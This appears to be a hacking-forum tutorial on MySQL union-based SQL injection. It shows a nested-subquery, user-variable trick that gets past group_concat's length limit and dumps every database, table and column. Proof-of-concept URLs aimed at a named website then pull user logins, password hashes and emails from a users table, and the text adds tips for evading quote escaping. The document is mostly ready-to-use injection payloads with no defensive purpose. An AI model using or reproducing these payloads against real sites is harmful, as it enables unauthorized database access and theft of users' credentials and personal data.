greetz to ๖ۣۜDan & DenJacker

What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.


First of, the database/table/columns.

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+




Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.

View the source, and we see every single database/table/column accessible.


[spoiler][/spoiler]




Now, to grab information from the columns.


(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)


POC

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+



Thanks for viewing this tutorial. If you need help, post below. If you have anything you want added, post below or pm me. Thanks